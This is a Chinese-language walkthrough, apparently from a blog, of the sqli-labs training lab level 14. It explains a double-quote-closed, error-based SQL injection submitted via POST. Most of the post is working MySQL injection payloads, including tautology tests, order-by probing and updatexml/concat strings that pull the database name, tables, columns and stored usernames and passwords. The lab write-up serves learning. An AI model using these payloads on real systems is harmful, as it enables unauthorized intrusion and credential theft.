当前位置: 首页 > news >正文

sqli-labs关卡14(基于post提交的双引号闭合的报错注入)通关思路

news 2025/8/8 3:56:20

文章目录

  • 前言
  • 一、回顾上一关知识点
  • 二、靶场第十四关通关思路
    • 1、判断注入点
    • 2、爆显位
    • 3、爆数据库名
    • 4、爆数据库表
    • 5、爆数据库列
    • 6、爆数据库关键信息
  • 总结

前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!

`

一、回顾上一关知识点

上一关是典型的布尔盲注或可以报错盲注。

二、靶场第十四关通关思路

  • 1、判断注入点
  • 2、爆显位
  • 3、爆数据库名
  • 4、爆数据库表
  • 5、爆数据库列
  • 6、爆数据库关键信息

1、判断注入点

老规矩还是使用万能语句1 or 1=1 和 1 or 1=2发现页面正常,所以排除数字型。输入1'发现并没有报错说明可能是和双引号闭合有关,再输入1"发现报错,报错信息为

You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near ‘“1"” and password=“” LIMIT 0,1’ at line 1

通过报错信息可以知道是双引号闭合。我们构造payload

1" or 1=1#

1" or 1=2#

发现1=1页面正常,1=2页面异常
在这里插入图片描述
在这里插入图片描述
细心发现页面正常和异常只会出现提示successfully或failed。就像布尔盲注的ture或false。并没有回显内容。这里明显可以用布尔或者是报错盲注。这里我就用报错注入了,比较简单。

2、爆显位

注入语句为

1" order by 3#

在这里插入图片描述
发现3报错,说明有2个显位。

3、爆数据库名

注入语句为

1" or updatexml(1,concat(0x3a,(select database()),0x3a),1)#

在这里插入图片描述
得到数据库名

4、爆数据库表

注入语句为

1" or updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a),1)#

在这里插入图片描述
得到关键数据库表名users

5、爆数据库列

注入语句为

1" or updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x3a),1)#

1" or updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x3a),1)#

在这里插入图片描述
在这里插入图片描述
得到关键数据库列username,password

6、爆数据库关键信息

注入语句为

1" or updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1)#

1" or updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1)#

在这里插入图片描述
在这里插入图片描述
得到关键账号密码

总结

这一关用的是报错注入,布尔盲注也适用。如果不懂报错注入流程可以看我的文章第五关解析。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

http://www.lryc.cn/news/228748.html

相关文章:

  • 【广州华锐互动】楼宇智能化VR虚拟教学系统
  • 5. HTML常用标签
  • 傅里叶分析(2)
  • Mysql8数据库如何给用户授权
  • reticulate | R-python调用 | 安装及配置 | conda文件配置
  • VueRequest——管理请求状态库
  • GPT-4 Turbo 发布 | 大模型训练的新时代:超算互联网的调度与调优
  • Django路由层
  • 关于session的不断变化问题
  • eNSP启动路由器一直出#号、以为是安装配置winpcap的问题。。。。(以为是win10安装winpcap失败的问题。。。)
  • 时间序列预测:深度学习、机器学习、融合模型、创新模型实战案例(附代码+数据集+原理介绍)
  • docker安装RocketMQ
  • 优秀智慧园区案例 - 珠海华发智慧园区,万字长文解析先进智慧园区建设方案经验
  • 毕业设计项目:基于java+springboot的共享单车信息网站
  • Redis 连接不上 WRONGPASS invalid username-password pair
  • 三分钟学完Git版本控制常用指令
  • vue3使用粒子特效
  • DMDEM部署说明-详细步骤-(DM8达梦数据库)
  • aws亚马逊:什么是 Amazon EC2?
  • 【BMC】jsnbd介绍
  • 个推「数据驱动运营增长」上海专场:携程智行火车票分享OTA行业的智能用户运营实践
  • Linux--gcc/g++
  • MySQL5.7源码编译安装
  • uniapp使用v-for页面不刷新解决办法
  • 发布一款将APM日志转换为Excel的开源工具
  • 本地化小程序运营 同城小程序开发
  • 关于electron打包卡在winCodeSign下载问题
  • 01_ddim_inversion_CN
  • ElasticSearch的文档、字段、映射和高级查询
  • vim相关命令讲解!